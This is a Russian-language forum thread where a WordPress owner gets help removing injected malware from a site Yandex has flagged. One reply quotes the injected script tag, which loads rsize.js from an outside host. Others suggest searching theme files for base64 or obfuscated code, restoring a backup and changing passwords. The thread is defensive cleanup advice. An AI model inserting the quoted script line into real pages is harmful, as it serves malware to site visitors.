Помогите найти вредоносный код wp

Смотри лишний код в .htaccess ) Если не поможет, отпишись, скажу где еще смотреть. Если поможет, то тоже отпишись )

собственно забыл указать сайт , urtano.ru вот на нем проблема, щас гляну htaccess, спасибо

в .htaccess все норм, посмотрел

Вообще это долджен быть код в base64 где нибудь в футере страницы. А вообще яндекс показывает где именно его нужно смотреть - от этого и нужно оттолкнуться.
Еще как вариант - какие моды ставились в последние дни?
А по сути такой момент решается бэкапом файлов.

кроме плагинов All in One SEO Pack, Google XML Sitemaps, WP-PageNavi, iSape, Wp-Thumbie ничего не ставил, но я исключаю возможность что вирус в плагинах, т.к. папку с плагинами выкачивал с другого сайта, а с тем сайтом все нормально. В яндекс панели вебмастера так и не нашел внятного ответа где находится вирус, тупо написано urtano.ru и все

У тебя на главной странице встроилось "

</html><script src="http://feelthesame.changeip.name/rsize.js"></script>
Значит, скорее всего в footer.php в админке посмотри и удали.

Да, это на всех страницах. Значит в футере...

Как решишь проблему, желательно выкачай все файлы с фтп, и Тотал коммандером пройдись на наличие кода лишнего поиском. Код должен быть зашифрованным как писали выше. Но начало у него Всегда что-то вроде "Var" и дальше не помню. После этого перезалей все файлы, смени пароли на фтп, админку и mysql желательно.

http://www.google.com/webmasters/hacked/

надо через Notepad++ выбрать поиск-найти в файлах:
фразы "encode", "base64", "rsize"
Если найдешь, то смотри по коду что будет с ним и без него)

как код прописывается я так и не нашел, проблему решил перезалитием бекапа, как советовали выше установил права на индекс.пхп 444 .Сменил все пароли к сайту. Понаблюдаю пока за сайтом, если проблема вновь возникнет - придется искать этот самый код. Всем большое спасибо за помощь!!!

Бесплатная тема WP последних трех лет - всегда проблема. Меня запарили многочисленные зомби-js, и я к чертовой матери снес все старые темы и написал свои собственные. Теперь уверен и в самих темах, и в том, что они летают, как истребители - нет лишних и ненужных элементов.
А тебе тут главного не написали - код может скрываться в functions.php, причем обфусцированный. В десятки тысяч знаков...

полюбому в теме спрятан этот код, если еще раз такая проблема возникнет то поставлю свою тему, уже проверенную. Посмотрел сейчас functions.php, нет ничего даже похожего на этот код, хотя как вы говорите он может быть и зашифрованным..

Как писали выше, данный код скорее всего зашифрован в functions, очень часто при попытке его удаления, тема перестает работать.

Мой вам совет-смените тему и запросите повторную проверку сайта, когда получите ответ, делайте выводы